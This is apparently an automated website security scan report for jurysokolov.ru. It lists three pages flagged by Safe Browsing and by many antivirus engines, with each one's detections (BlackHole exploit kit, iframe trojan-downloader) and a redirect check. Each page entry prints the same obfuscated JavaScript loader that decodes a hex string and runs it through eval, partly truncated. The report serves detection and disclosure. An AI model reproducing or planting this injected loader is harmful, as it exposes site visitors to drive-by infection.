Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=jurysokolov.ru
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available
here.
Scanned pages/files
| Request | Server response | Status |
http://www.jurysokolov.ru/ | 200 OK
Content-Length: 11914
Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) cup=String;sjqfnu="spl"+"i"+"t";akml=window;lmrzvl=(1)?"0x":"123";kudlu=(6-4-1);try{if(0x6===Math.ceil(5.5))--(document["b"+"ody"])}catch(qftp){pvdsa=false;try{}catch(ksbs){pvdsa=21;}
if(1){kgr="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq61Zq5cZq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq61Z
... 3004 bytes are skipped ...Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq61Zq5cZq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[sjqfnu]("Zq");}akml=kgr;lvhdp=[];for(lbqmu=22-20-2;-lbqmu+1381!=0;lbqmu+=1){gada=lbqmu;if((0x19==031))lvhdp+=cup.fromCharCode(eval(lmrzvl+akml[1*gada])+0xa-kudlu);}avuv=eval;z=123;if(Math.ceil(5.5)===6)avuv(lvhdp)}Antivirus reports:- AntiVir
- JS/Quidvetis.A
- Avast
- JS:Decode-BLJ [Trj]
- Ikarus
- Trojan-Downloader.JS.Iframe
- nProtect
- JS:Exploit.BlackHole.OA
- K7AntiVirus
- Trojan
- TrendMicro-HouseCall
- TROJ_GEN.F47V1025
- Emsisoft
- JS:Exploit.BlackHole.OA (B)
- Comodo
- TrojWare.JS.Kryptik.xt
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Kaspersky
- Exploit.JS.Agent.bnu
- Microsoft
- Trojan:JS/Quidvetis.A
- MicroWorld-eScan
- JS:Trojan.Script.CIV
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.OA
- F-Prot
- JS/IFrame.RS
- AVG
- JS/Exploit
- Norman
- Quidvetis.A
- GData
- JS:Exploit.BlackHole.OA
- Commtouch
- JS/IFrame.RS
|
http://www.jurysokolov.ru/about.html | 200 OK
Content-Length: 12370
Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) cup=String;sjqfnu="spl"+"i"+"t";akml=window;lmrzvl=(1)?"0x":"123";kudlu=(6-4-1);try{if(0x6===Math.ceil(5.5))--(document["b"+"ody"])}catch(qftp){pvdsa=false;try{}catch(ksbs){pvdsa=21;}
if(1){kgr="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq61Zq5cZq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq61Z
... 3004 bytes are skipped ...Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq61Zq5cZq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[sjqfnu]("Zq");}akml=kgr;lvhdp=[];for(lbqmu=22-20-2;-lbqmu+1381!=0;lbqmu+=1){gada=lbqmu;if((0x19==031))lvhdp+=cup.fromCharCode(eval(lmrzvl+akml[1*gada])+0xa-kudlu);}avuv=eval;z=123;if(Math.ceil(5.5)===6)avuv(lvhdp)}Antivirus reports:- AntiVir
- JS/Quidvetis.A
- Avast
- JS:Decode-BLJ [Trj]
- Ikarus
- Trojan-Downloader.JS.Iframe
- nProtect
- JS:Exploit.BlackHole.OA
- K7AntiVirus
- Trojan
- TrendMicro-HouseCall
- TROJ_GEN.F47V1025
- Emsisoft
- JS:Exploit.BlackHole.OA (B)
- Comodo
- TrojWare.JS.Kryptik.xt
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Kaspersky
- Exploit.JS.Agent.bnu
- Microsoft
- Trojan:JS/Quidvetis.A
- MicroWorld-eScan
- JS:Trojan.Script.CIV
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.OA
- F-Prot
- JS/IFrame.RS
- AVG
- JS/Exploit
- Norman
- Quidvetis.A
- GData
- JS:Exploit.BlackHole.OA
- Commtouch
- JS/IFrame.RS
|
http://www.jurysokolov.ru/test404page.js | 404 Not Found
Content-Length: 11474
Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) cup=String;sjqfnu="spl"+"i"+"t";akml=window;lmrzvl=(1)?"0x":"123";kudlu=(6-4-1);try{if(0x6===Math.ceil(5.5))--(document["b"+"ody"])}catch(qftp){pvdsa=false;try{}catch(ksbs){pvdsa=21;}
if(1){kgr="17Zq5dZq6cZq65Zq5aZq6bZq60Zq66Zq65Zq17Zq61Zq5cZq27Zq30Zq1fZq20Zq17Zq72Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq6aZq6bZq58Zq6bZq60Zq5aZq34Zq1eZq58Zq61Zq58Zq6fZq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq5aZq66Zq65Zq6bZq69Zq66Zq63Zq63Zq5cZq69Zq34Zq1eZq60Zq65Zq5bZq5cZq6fZq25Zq67Zq5fZq67Zq1eZq32Zq4Zq1Zq17Zq6dZq58Zq69Zq17Zq61Z
... 3004 bytes are skipped ...Zq6cZq68Zq1eZq20Zq34Zq34Zq2cZq2cZq20Zq72Zq74Zq5cZq63Zq6aZq5cZq72Zq4aZq5cZq6bZq3aZq66Zq66Zq62Zq60Zq5cZq1fZq1eZq6dZq60Zq6aZq60Zq6bZq5cZq5bZq56Zq6cZq68Zq1eZq23Zq17Zq1eZq2cZq2cZq1eZq23Zq17Zq1eZq28Zq1eZq23Zq17Zq1eZq26Zq1eZq20Zq32Zq4Zq1Zq4Zq1Zq61Zq5cZq27Zq30Zq1fZq20Zq32Zq4Zq1Zq74Zq4Zq1Zq74"[sjqfnu]("Zq");}akml=kgr;lvhdp=[];for(lbqmu=22-20-2;-lbqmu+1381!=0;lbqmu+=1){gada=lbqmu;if((0x19==031))lvhdp+=cup.fromCharCode(eval(lmrzvl+akml[1*gada])+0xa-kudlu);}avuv=eval;z=123;if(Math.ceil(5.5)===6)avuv(lvhdp)}Antivirus reports:- AntiVir
- JS/Quidvetis.A
- Avast
- JS:Decode-BLJ [Trj]
- Ikarus
- Trojan-Downloader.JS.Iframe
- nProtect
- JS:Exploit.BlackHole.OA
- K7AntiVirus
- Trojan
- TrendMicro-HouseCall
- TROJ_GEN.F47V1025
- Emsisoft
- JS:Exploit.BlackHole.OA (B)
- Comodo
- TrojWare.JS.Kryptik.xt
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- DrWeb
- JS.IFrame.500
- Kaspersky
- Exploit.JS.Agent.bnu
- Microsoft
- Trojan:JS/Quidvetis.A
- MicroWorld-eScan
- JS:Trojan.Script.CIV
- Fortinet
- JS/Kryptik.AOW!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Expack.chwlwn
- F-Secure
- JS:Exploit.BlackHole.OA
- F-Prot
- JS/IFrame.RS
- AVG
- JS/Exploit
- Norman
- Quidvetis.A
- GData
- JS:Exploit.BlackHole.OA
- Commtouch
- JS/IFrame.RS
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: jurysokolov.ru
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: jurysokolov.ru
Referer: http://www.google.com/search?q=jurysokolov.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
